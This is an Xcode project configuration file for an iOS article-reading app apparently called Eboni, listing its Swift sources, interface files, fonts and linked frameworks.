// !$*UTF8*$!
{
	archiveVersion = 1;
	classes = {
	};
	objectVersion = 51;
	objects = {

/* Begin PBXBuildFile section */
		1808DFDA25939CCD00FADA22 /* open-sans.bold.ttf in Resources */ = {isa = PBXBuildFile; fileRef = 1808DFD925939CCD00FADA22 /* open-sans.bold.ttf */; };
		1808DFDC25939CD600FADA22 /* open-sans.regular.ttf in Resources */ = {isa = PBXBuildFile; fileRef = 1808DFDB25939CD600FADA22 /* open-sans.regular.ttf */; };
		1808DFDE25939CDF00FADA22 /* open-sans.semibold.ttf in Resources */ = {isa = PBXBuildFile; fileRef = 1808DFDD25939CDE00FADA22 /* open-sans.semibold.ttf */; };
		180AE1AE2556CB5600153137 /* articleListCell.xib in Resources */ = {isa = PBXBuildFile; fileRef = 180AE1AD2556CB5600153137 /* articleListCell.xib */; };
		180AE1B12556CC9500153137 /* belowModel.swift in Sources */ = {isa = PBXBuildFile; fileRef = 180AE1AF2556CC9500153137 /* belowModel.swift */; };
		180AE1B42556D07500153137 /* articleListCell.swift in Sources */ = {isa = PBXBuildFile; fileRef = 180AE1B32556D07500153137 /* articleListCell.swift */; };
		180E125E2590772400C9D46A /* topTopicsListVM.swift in Sources */ = {isa = PBXBuildFile; fileRef = 180E125D2590772400C9D46A /* topTopicsListVM.swift */; };
		180E1263259077D600C9D46A /* TopTopicsCell.xib in Resources */ = {isa = PBXBuildFile; fileRef = 180E1262259077D600C9D46A /* TopTopicsCell.xib */; };
		180E1265259077E100C9D46A /* TopTopicsCell.swift in Sources */ = {isa = PBXBuildFile; fileRef = 180E1264259077E100C9D46A /* TopTopicsCell.swift */; };
		180E12682590874200C9D46A /* CustomfollowingHeaderview.xib in Resources */ = {isa = PBXBuildFile; fileRef = 180E12672590874200C9D46A /* CustomfollowingHeaderview.xib */; };
		180E126A2590875600C9D46A /* CustomfollowingHeaderview.swift in Sources */ = {isa = PBXBuildFile; fileRef = 180E12692590875600C9D46A /* CustomfollowingHeaderview.swift */; };
		180E126D2590936A00C9D46A /* TopChannelCell.xib in Resources */ = {isa = PBXBuildFile; fileRef = 180E126C2590936A00C9D46A /* TopChannelCell.xib */; };
		180E126F2590937300C9D46A /* TopChannelCell.swift in Sources */ = {isa = PBXBuildFile; fileRef = 180E126E2590937300C9D46A /* TopChannelCell.swift */; };
		180E12712590946C00C9D46A /* topChannelsListVM.swift in Sources */ = {isa = PBXBuildFile; fileRef = 180E12702590946C00C9D46A /* topChannelsListVM.swift */; };
		1812C9C32579FE8E0035C5C4 /* createFolderViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 1812C9C22579FE8E0035C5C4 /* createFolderViewController.swift */; };
		1812C9C62579FEE90035C5C4 /* CreateFolderPopUp.xib in Resources */ = {isa = PBXBuildFile; fileRef = 1812C9C52579FEE90035C5C4 /* CreateFolderPopUp.xib */; };
		1812C9C82579FEF40035C5C4 /* CreateFolderPopUp.swift in Sources */ = {isa = PBXBuildFile; fileRef = 1812C9C72579FEF40035C5C4 /* CreateFolderPopUp.swift */; };
		1812C9CB257A0C1F0035C5C4 /* displayFolderCell.xib in Resources */ = {isa = PBXBuildFile; fileRef = 1812C9CA257A0C1F0035C5C4 /* displayFolderCell.xib */; };
		18233B6925CACC8A007E35FA /* PushNotificationManager.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18233B6825CACC8A007E35FA /* PushNotificationManager.swift */; };
		182A50B125545CF300D5D040 /* Colors.swift in Sources */ = {isa = PBXBuildFile; fileRef = 182A50B025545CF300D5D040 /* Colors.swift */; };
		182A50B425546AEA00D5D040 /* Homepagebox_message.swift in Sources */ = {isa = PBXBuildFile; fileRef = 182A50B225546AE900D5D040 /* Homepagebox_message.swift */; };
		182A50B525546AEA00D5D040 /* bannerModel.swift in Sources */ = {isa = PBXBuildFile; fileRef = 182A50B325546AE900D5D040 /* bannerModel.swift */; };
		182ED2BA2570C8320077FA49 /* locationViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 182ED2B92570C8320077FA49 /* locationViewController.swift */; };
		182ED2BC2570E8BF0077FA49 /* imgUplodViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 182ED2BB2570E8BF0077FA49 /* imgUplodViewController.swift */; };
		1838740325EF7C05001A3806 /* addFolderVC.swift in Sources */ = {isa = PBXBuildFile; fileRef = 1838740225EF7C05001A3806 /* addFolderVC.swift */; };
		183909622633284500D7FC0A /* UXCam.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 183909612633284500D7FC0A /* UXCam.framework */; };
		183909642633286600D7FC0A /* AVFoundation.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 183909632633286600D7FC0A /* AVFoundation.framework */; };
		183909662633286C00D7FC0A /* Security.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 183909652633286C00D7FC0A /* Security.framework */; };
		183909682633287300D7FC0A /* CoreGraphics.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 183909672633287300D7FC0A /* CoreGraphics.framework */; };
		1839096A2633288400D7FC0A /* CoreMedia.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 183909692633288400D7FC0A /* CoreMedia.framework */; };
		1839096C2633289700D7FC0A /* libz.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = 1839096B2633289700D7FC0A /* libz.tbd */; };
		18390971263328A100D7FC0A /* WebKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 18390970263328A000D7FC0A /* WebKit.framework */; };
		18390973263328AB00D7FC0A /* SystemConfiguration.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 18390972263328AB00D7FC0A /* SystemConfiguration.framework */; };
		18390975263328B500D7FC0A /* QuartzCore.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 18390974263328B500D7FC0A /* QuartzCore.framework */; };
		1839097C263328CF00D7FC0A /* CoreTelephony.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 1839097B263328CF00D7FC0A /* CoreTelephony.framework */; };
		18390981263328DB00D7FC0A /* CoreVideo.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 18390980263328DA00D7FC0A /* CoreVideo.framework */; };
		183909B7263329CF00D7FC0A /* CoreServices.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 183909B6263329CF00D7FC0A /* CoreServices.framework */; };
		184052FC25680FDE00A77882 /* loginPopupVC.swift in Sources */ = {isa = PBXBuildFile; fileRef = 184052FB25680FDD00A77882 /* loginPopupVC.swift */; };
		18451671265E228200B274F0 /* otpViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18451670265E228200B274F0 /* otpViewController.swift */; };
		184516AB265E345500B274F0 /* changePassViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 184516AA265E345500B274F0 /* changePassViewController.swift */; };
		184A65FC257BFA3900CC0089 /* allFolderList.swift in Sources */ = {isa = PBXBuildFile; fileRef = 184A65FB257BFA3900CC0089 /* allFolderList.swift */; };
		184AA19A265632D00037405F /* Sharing.swift in Sources */ = {isa = PBXBuildFile; fileRef = 184AA199265632D00037405F /* Sharing.swift */; };
		184E1FA425873F0B00D7FBAD /* sharePopUpView.xib in Resources */ = {isa = PBXBuildFile; fileRef = 184E1FA325873F0B00D7FBAD /* sharePopUpView.xib */; };
		184E1FA625873F2400D7FBAD /* sharePopUpView.swift in Sources */ = {isa = PBXBuildFile; fileRef = 184E1FA525873F2400D7FBAD /* sharePopUpView.swift */; };
		1852527C25C9A7290081DC89 /* GoogleService-Info.plist in Resources */ = {isa = PBXBuildFile; fileRef = 1852527B25C9A7290081DC89 /* GoogleService-Info.plist */; };
		185292B5253D53E1006EB82D /* AppDelegate.swift in Sources */ = {isa = PBXBuildFile; fileRef = 185292B4253D53E1006EB82D /* AppDelegate.swift */; };
		185292BC253D53E1006EB82D /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 185292BA253D53E1006EB82D /* Main.storyboard */; };
		185292BE253D53E5006EB82D /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = 185292BD253D53E5006EB82D /* Assets.xcassets */; };
		185292C1253D53E5006EB82D /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 185292BF253D53E5006EB82D /* LaunchScreen.storyboard */; };
		185292CC253D53E5006EB82D /* EboniTests.swift in Sources */ = {isa = PBXBuildFile; fileRef = 185292CB253D53E5006EB82D /* EboniTests.swift */; };
		185292D7253D53E5006EB82D /* EboniUITests.swift in Sources */ = {isa = PBXBuildFile; fileRef = 185292D6253D53E5006EB82D /* EboniUITests.swift */; };
		1858BFD526032D5700F9A204 /* appleButton.swift in Sources */ = {isa = PBXBuildFile; fileRef = 1858BFD426032D5700F9A204 /* appleButton.swift */; };
		185C34A1265CB78700E9E4BA /* loginByEmailVC.swift in Sources */ = {isa = PBXBuildFile; fileRef = 185C34A0265CB78700E9E4BA /* loginByEmailVC.swift */; };
		185C351E265CF2FE00E9E4BA /* registerViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 185C351D265CF2FE00E9E4BA /* registerViewController.swift */; };
		185C3589265D155B00E9E4BA /* userExistVC.swift in Sources */ = {isa = PBXBuildFile; fileRef = 185C3588265D155B00E9E4BA /* userExistVC.swift */; };
		185C358E265D381F00E9E4BA /* forgetPassViewContoller.swift in Sources */ = {isa = PBXBuildFile; fileRef = 185C358D265D381F00E9E4BA /* forgetPassViewContoller.swift */; };
		185FFD842540336F002F3F1A /* RCustomClass.swift in Sources */ = {isa = PBXBuildFile; fileRef = 185FFD832540336F002F3F1A /* RCustomClass.swift */; };
		1865C56A25938C620043FAFF /* customLoader.swift in Sources */ = {isa = PBXBuildFile; fileRef = 1865C56925938C620043FAFF /* customLoader.swift */; };
		186DDFAE2556442D0024F681 /* topArticleCell.xib in Resources */ = {isa = PBXBuildFile; fileRef = 186DDFAD2556442D0024F681 /* topArticleCell.xib */; };
		186DDFB0255644430024F681 /* topArticleCell.swift in Sources */ = {isa = PBXBuildFile; fileRef = 186DDFAF255644430024F681 /* topArticleCell.swift */; };
		1874EFFF25948E86005AFD68 /* open-sans.light.ttf in Resources */ = {isa = PBXBuildFile; fileRef = 1874EFFD25948E86005AFD68 /* open-sans.light.ttf */; };
		1874F00025948E86005AFD68 /* open-sans.extrabold.ttf in Resources */ = {isa = PBXBuildFile; fileRef = 1874EFFE25948E86005AFD68 /* open-sans.extrabold.ttf */; };
		1874F0022594D8E9005AFD68 /* imagePickerClass.swift in Sources */ = {isa = PBXBuildFile; fileRef = 1874F0012594D8E9005AFD68 /* imagePickerClass.swift */; };
		18784DF925887EDB00FA2A94 /* sharePopupViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18784DF825887EDB00FA2A94 /* sharePopupViewController.swift */; };
		187DDD2F25697D6900B841B2 /* loginPopUpView.xib in Resources */ = {isa = PBXBuildFile; fileRef = 187DDD2E25697D6900B841B2 /* loginPopUpView.xib */; };
		187DDD3125697D8700B841B2 /* loginPopUpView.swift in Sources */ = {isa = PBXBuildFile; fileRef = 187DDD3025697D8700B841B2 /* loginPopUpView.swift */; };
		188743A425FA633500963215 /* shareInviteView.xib in Resources */ = {isa = PBXBuildFile; fileRef = 188743A325FA633500963215 /* shareInviteView.xib */; };
		188743A925FA634200963215 /* shareInviteView.swift in Sources */ = {isa = PBXBuildFile; fileRef = 188743A825FA634200963215 /* shareInviteView.swift */; };
		188743AE25FA640500963215 /* shareInviteViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 188743AD25FA640500963215 /* shareInviteViewController.swift */; };
		188A07F7253FF889002444A4 /* loginViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 188A07F6253FF889002444A4 /* loginViewController.swift */; };
		188B9C5E2546C6EF00FC188D /* loginModel.swift in Sources */ = {isa = PBXBuildFile; fileRef = 188B9C5C2546C6EF00FC188D /* loginModel.swift */; };
		188B9C5F2546C6EF00FC188D /* User_info.swift in Sources */ = {isa = PBXBuildFile; fileRef = 188B9C5D2546C6EF00FC188D /* User_info.swift */; };
		188B9C6125472C2500FC188D /* homeViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 188B9C6025472C2500FC188D /* homeViewController.swift */; };
		188ED1B62555A7D90092D5FA /* top10Model.swift in Sources */ = {isa = PBXBuildFile; fileRef = 188ED1B42555A7D90092D5FA /* top10Model.swift */; };
		188ED1B72555A7D90092D5FA /* AllarticlesLists.swift in Sources */ = {isa = PBXBuildFile; fileRef = 188ED1B52555A7D90092D5FA /* AllarticlesLists.swift */; };
		1890B8DD256D7A59000927F6 /* foldersListViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 1890B8DC256D7A59000927F6 /* foldersListViewController.swift */; };
		189B0BA52570A54B00AFBE1A /* aboutViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 189B0BA42570A54B00AFBE1A /* aboutViewController.swift */; };
		18A0397A256EBD45008E561A /* settingsViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18A03979256EBD45008E561A /* settingsViewController.swift */; };
		18A5726126415BAB00A3C074 /* bannerAdsCell.xib in Resources */ = {isa = PBXBuildFile; fileRef = 18A5726026415BAB00A3C074 /* bannerAdsCell.xib */; };
		18A5729E264188ED00A3C074 /* bannerAdsCell.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18A5729D264188ED00A3C074 /* bannerAdsCell.swift */; };
		18A60FAC256BE9A300D51D32 /* searchListViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18A60FAB256BE9A300D51D32 /* searchListViewController.swift */; };
		18B55D962577E2690009C9B2 /* FolderArticleCell.xib in Resources */ = {isa = PBXBuildFile; fileRef = 18B55D952577E2690009C9B2 /* FolderArticleCell.xib */; };
		18B55D982577E2850009C9B2 /* FolderArticleCell.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18B55D972577E2850009C9B2 /* FolderArticleCell.swift */; };
		18B69EF2265FD15C00E7F74C /* signPrivacyVC.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18B69EF1265FD15C00E7F74C /* signPrivacyVC.swift */; };
		18BC7A70258F29AD00F52FA5 /* followingViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18BC7A6F258F29AD00F52FA5 /* followingViewController.swift */; };
		18BC7A75258F505800F52FA5 /* FollowingModel.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18BC7A72258F505700F52FA5 /* FollowingModel.swift */; };
		18BC7A76258F505800F52FA5 /* Top10_channels.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18BC7A73258F505700F52FA5 /* Top10_channels.swift */; };
		18BC7A77258F505800F52FA5 /* Top10_topics.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18BC7A74258F505700F52FA5 /* Top10_topics.swift */; };
		18BFF0C42593404100C847C3 /* allChannelListViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18BFF0C32593404100C847C3 /* allChannelListViewController.swift */; };
		18BFF0C6259375F400C847C3 /* allPublisherListViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18BFF0C5259375F400C847C3 /* allPublisherListViewController.swift */; };
		18C82EBC2551490B00318BAB /* extensionClass.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18C82EBB2551490B00318BAB /* extensionClass.swift */; };
		18C82EBF2551754800318BAB /* catModel.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18C82EBD2551754700318BAB /* catModel.swift */; };
		18C82EC02551754800318BAB /* Category_info.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18C82EBE2551754800318BAB /* Category_info.swift */; };
		18CB620D262F3A8A00D916C7 /* UnifiedNativeAdCell.xib in Resources */ = {isa = PBXBuildFile; fileRef = 18CB620C262F3A8A00D916C7 /* UnifiedNativeAdCell.xib */; };
		18CBFAC9256F7CC1000B7E14 /* privacyTermsViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18CBFAC8256F7CC1000B7E14 /* privacyTermsViewController.swift */; };
		18CBFACB256F7F93000B7E14 /* privacyModel.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18CBFACA256F7F93000B7E14 /* privacyModel.swift */; };
		18CBFACD256FE40C000B7E14 /* feedbackViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18CBFACC256FE40C000B7E14 /* feedbackViewController.swift */; };
		18CF6BA2257B3C4B00C8D2D9 /* displayFolderCell.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18CF6BA1257B3C4B00C8D2D9 /* displayFolderCell.swift */; };
		18CF6BA4257B3DF100C8D2D9 /* folderTblListVM.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18CF6BA3257B3DF100C8D2D9 /* folderTblListVM.swift */; };
		18CF6BA7257B8EDF00C8D2D9 /* allFolderListModel.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18CF6BA5257B8EDE00C8D2D9 /* allFolderListModel.swift */; };
		18CFA0B9256397C500CFEBD2 /* detailViewContoller.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18CFA0B8256397C500CFEBD2 /* detailViewContoller.swift */; };
		18CFA0BB25640E4800CFEBD2 /* publisherListViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18CFA0BA25640E4800CFEBD2 /* publisherListViewController.swift */; };
		18DB5B8225789DF00036B17C /* AllarticlesListsByFolder.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18DB5B8025789DF00036B17C /* AllarticlesListsByFolder.swift */; };
		18DB5B8325789DF00036B17C /* listByFolder.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18DB5B8125789DF00036B17C /* listByFolder.swift */; };
		18DB5B8525789F140036B17C /* articleByFolderVC.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18DB5B8425789F140036B17C /* articleByFolderVC.swift */; };
		18DB5B872578A2050036B17C /* articleByFolderListVM.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18DB5B862578A2050036B17C /* articleByFolderListVM.swift */; };
		18DB5B8A2578CE460036B17C /* RemoveItemfromFolder.xib in Resources */ = {isa = PBXBuildFile; fileRef = 18DB5B892578CE460036B17C /* RemoveItemfromFolder.xib */; };
		18DB5B8C2578CFC20036B17C /* RemoveItemfromFolder.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18DB5B8B2578CFC20036B17C /* RemoveItemfromFolder.swift */; };
		18DBD3142559691A009370EF /* AllarticlesLists_below.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18DBD31325596919009370EF /* AllarticlesLists_below.swift */; };
		18F18FDD2542AA5B00B80791 /* Constant.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18F18FDC2542AA5B00B80791 /* Constant.swift */; };
		18F18FDF2542AE2600B80791 /* ApiClient.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18F18FDE2542AE2600B80791 /* ApiClient.swift */; };
		18F6422F25C83DE100007E67 /* credentials.plist in Resources */ = {isa = PBXBuildFile; fileRef = 18F6422E25C83DE100007E67 /* credentials.plist */; };
		18F6C1E7256A31AC001634FC /* BaseTableViewVM.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18F6C1E6256A31AC001634FC /* BaseTableViewVM.swift */; };
		18F6C1E9256A3258001634FC /* articleListVM.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18F6C1E8256A3258001634FC /* articleListVM.swift */; };
		18F9B19E25FB90D300FF9A79 /* splashViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18F9B19D25FB90D300FF9A79 /* splashViewController.swift */; };
		18FA19F52574BAB9006D28DD /* FolderList.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18FA19F42574BAB9006D28DD /* FolderList.swift */; };
		18FA19F72574BAC1006D28DD /* FolderModel.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18FA19F62574BAC0006D28DD /* FolderModel.swift */; };
		18FA19FA2574C58C006D28DD /* folderListCell.xib in Resources */ = {isa = PBXBuildFile; fileRef = 18FA19F92574C58C006D28DD /* folderListCell.xib */; };
		18FA19FC2574D36B006D28DD /* folderListCell.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18FA19FB2574D36B006D28DD /* folderListCell.swift */; };
		18FA19FE2574D655006D28DD /* folderListVM.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18FA19FD2574D655006D28DD /* folderListVM.swift */; };
		18FA1A002574D7B2006D28DD /* BaseCollectionViewVM.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18FA19FF2574D7B2006D28DD /* BaseCollectionViewVM.swift */; };
		18FA1A0325756138006D28DD /* updateFolder.xib in Resources */ = {isa = PBXBuildFile; fileRef = 18FA1A0225756138006D28DD /* updateFolder.xib */; };
		18FA1A052575696C006D28DD /* updateFolder.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18FA1A042575696C006D28DD /* updateFolder.swift */; };
		18FDFC4125B70DC200E8F203 /* featuredCell.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18FDFC4025B70DC100E8F203 /* featuredCell.swift */; };
		18FDFC4925B70E2200E8F203 /* featuredCell.xib in Resources */ = {isa = PBXBuildFile; fileRef = 18FDFC4825B70E2200E8F203 /* featuredCell.xib */; };
		18FF75192551C055002A1A4E /* BlackHistory_info.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18FF75172551C055002A1A4E /* BlackHistory_info.swift */; };
		18FF751A2551C055002A1A4E /* blackModel.swift in Sources */ = {isa = PBXBuildFile; fileRef = 18FF75182551C055002A1A4E /* blackModel.swift */; };
		51098920020E545939A3FD33 /* Pods_EboniTests.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 467EF786A88B5F98219DE061 /* Pods_EboniTests.framework */; };
		BFEE730192851BF7A0E0B36B /* Pods_Eboni_EboniUITests.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 11D7DA229B72498B2D4D1F14 /* Pods_Eboni_EboniUITests.framework */; };
		C9FEAD82C7FA04E974E97AE2 /* Pods_Eboni.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 9D57E68C477CEF3224389589 /* Pods_Eboni.framework */; };
/* End PBXBuildFile section */

/* Begin PBXContainerItemProxy section */
		185292C8253D53E5006EB82D /* PBXContainerItemProxy */ = {
			isa = PBXContainerItemProxy;
			containerPortal = 185292A9253D53E1006EB82D /* Project object */;
			proxyType = 1;
			remoteGlobalIDString = 185292B0253D53E1006EB82D;
			remoteInfo = Eboni;
		};
		185292D3253D53E5006EB82D /* PBXContainerItemProxy */ = {
			isa = PBXContainerItemProxy;
			containerPortal = 185292A9253D53E1006EB82D /* Project object */;
			proxyType = 1;
			remoteGlobalIDString = 185292B0253D53E1006EB82D;
			remoteInfo = Eboni;
		};
/* End PBXContainerItemProxy section */

/* Begin PBXCopyFilesBuildPhase section */
		180F4D9F25DE3910000AD233 /* Embed App Extensions */ = {
			isa = PBXCopyFilesBuildPhase;
			buildActionMask = 2147483647;
			dstPath = "";
			dstSubfolderSpec = 13;
			files = (
			);
			name = "Embed App Extensions";
			runOnlyForDeploymentPostprocessing = 0;
		};
/* End PBXCopyFilesBuildPhase section */

/* Begin PBXFileReference section */
		11D7DA229B72498B2D4D1F14 /* Pods_Eboni_EboniUITests.framework */ = {isa = PBXFileReference; explicitFileType = wrapper.framework; includeInIndex = 0; path = Pods_Eboni_EboniUITests.framework; sourceTree = BUILT_PRODUCTS_DIR; };
		1808DFD925939CCD00FADA22 /* open-sans.bold.ttf */ = {isa = PBXFileReference; lastKnownFileType = file; path = "open-sans.bold.ttf"; sourceTree = "<group>"; };
		1808DFDB25939CD600FADA22 /* open-sans.regular.ttf */ = {isa = PBXFileReference; lastKnownFileType = file; path = "open-sans.regular.ttf"; sourceTree = "<group>"; };
		1808DFDD25939CDE00FADA22 /* open-sans.semibold.ttf */ = {isa = PBXFileReference; lastKnownFileType = file; path = "open-sans.semibold.ttf"; sourceTree = "<group>"; };
		180AE1AD2556CB5600153137 /* articleListCell.xib */ = {isa = PBXFileReference; lastKnownFileType = file.xib; path = articleListCell.xib; sourceTree = "<group>"; };
		180AE1AF2556CC9500153137 /* belowModel.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = belowModel.swift; sourceTree = "<group>"; };
		180AE1B32556D07500153137 /* articleListCell.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = articleListCell.swift; sourceTree = "<group>"; };
		180E125D2590772400C9D46A /* topTopicsListVM.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = topTopicsListVM.swift; sourceTree = "<group>"; };
		180E1262259077D600C9D46A /* TopTopicsCell.xib */ = {isa = PBXFileReference; lastKnownFileType = file.xib; path = TopTopicsCell.xib; sourceTree = "<group>"; };
		180E1264259077E100C9D46A /* TopTopicsCell.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = TopTopicsCell.swift; sourceTree = "<group>"; };
		180E12672590874200C9D46A /* CustomfollowingHeaderview.xib */ = {isa = PBXFileReference; lastKnownFileType = file.xib; path = CustomfollowingHeaderview.xib; sourceTree = "<group>"; };
		180E12692590875600C9D46A /* CustomfollowingHeaderview.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = CustomfollowingHeaderview.swift; sourceTree = "<group>"; };
		180E126C2590936A00C9D46A /* TopChannelCell.xib */ = {isa = PBXFileReference; lastKnownFileType = file.xib; path = TopChannelCell.xib; sourceTree = "<group>"; };
		180E126E2590937300C9D46A /* TopChannelCell.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = TopChannelCell.swift; sourceTree = "<group>"; };
		180E12702590946C00C9D46A /* topChannelsListVM.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = topChannelsListVM.swift; sourceTree = "<group>"; };
		1812C9C22579FE8E0035C5C4 /* createFolderViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = createFolderViewController.swift; sourceTree = "<group>"; };
		1812C9C52579FEE90035C5C4 /* CreateFolderPopUp.xib */ = {isa = PBXFileReference; lastKnownFileType = file.xib; path = CreateFolderPopUp.xib; sourceTree = "<group>"; };
		1812C9C72579FEF40035C5C4 /* CreateFolderPopUp.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = CreateFolderPopUp.swift; sourceTree = "<group>"; };
		1812C9CA257A0C1F0035C5C4 /* displayFolderCell.xib */ = {isa = PBXFileReference; lastKnownFileType = file.xib; path = displayFolderCell.xib; sourceTree = "<group>"; };
		18233B6825CACC8A007E35FA /* PushNotificationManager.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = PushNotificationManager.swift; sourceTree = "<group>"; };
		182A50B025545CF300D5D040 /* Colors.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = Colors.swift; sourceTree = "<group>"; };
		182A50B225546AE900D5D040 /* Homepagebox_message.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = Homepagebox_message.swift; sourceTree = "<group>"; };
		182A50B325546AE900D5D040 /* bannerModel.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = bannerModel.swift; sourceTree = "<group>"; };
		182ED2B92570C8320077FA49 /* locationViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = locationViewController.swift; sourceTree = "<group>"; };
		182ED2BB2570E8BF0077FA49 /* imgUplodViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = imgUplodViewController.swift; sourceTree = "<group>"; };
		18348DFB25DF9E9B00BD8F2D /* UserNotifications.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = UserNotifications.framework; path = System/Library/Frameworks/UserNotifications.framework; sourceTree = SDKROOT; };
		18348DFD25DF9E9B00BD8F2D /* UserNotificationsUI.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = UserNotificationsUI.framework; path = System/Library/Frameworks/UserNotificationsUI.framework; sourceTree = SDKROOT; };
		1838740225EF7C05001A3806 /* addFolderVC.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = addFolderVC.swift; sourceTree = "<group>"; };
		183909612633284500D7FC0A /* UXCam.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; path = UXCam.framework; sourceTree = "<group>"; };
		183909632633286600D7FC0A /* AVFoundation.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = AVFoundation.framework; path = System/Library/Frameworks/AVFoundation.framework; sourceTree = SDKROOT; };
		183909652633286C00D7FC0A /* Security.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = Security.framework; path = System/Library/Frameworks/Security.framework; sourceTree = SDKROOT; };
		183909672633287300D7FC0A /* CoreGraphics.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = CoreGraphics.framework; path = System/Library/Frameworks/CoreGraphics.framework; sourceTree = SDKROOT; };
		183909692633288400D7FC0A /* CoreMedia.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = CoreMedia.framework; path = System/Library/Frameworks/CoreMedia.framework; sourceTree = SDKROOT; };
		1839096B2633289700D7FC0A /* libz.tbd */ = {isa = PBXFileReference; lastKnownFileType = "sourcecode.text-based-dylib-definition"; name = libz.tbd; path = usr/lib/libz.tbd; sourceTree = SDKROOT; };
		18390970263328A000D7FC0A /* WebKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = WebKit.framework; path = System/Library/Frameworks/WebKit.framework; sourceTree = SDKROOT; };
		18390972263328AB00D7FC0A /* SystemConfiguration.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = SystemConfiguration.framework; path = System/Library/Frameworks/SystemConfiguration.framework; sourceTree = SDKROOT; };
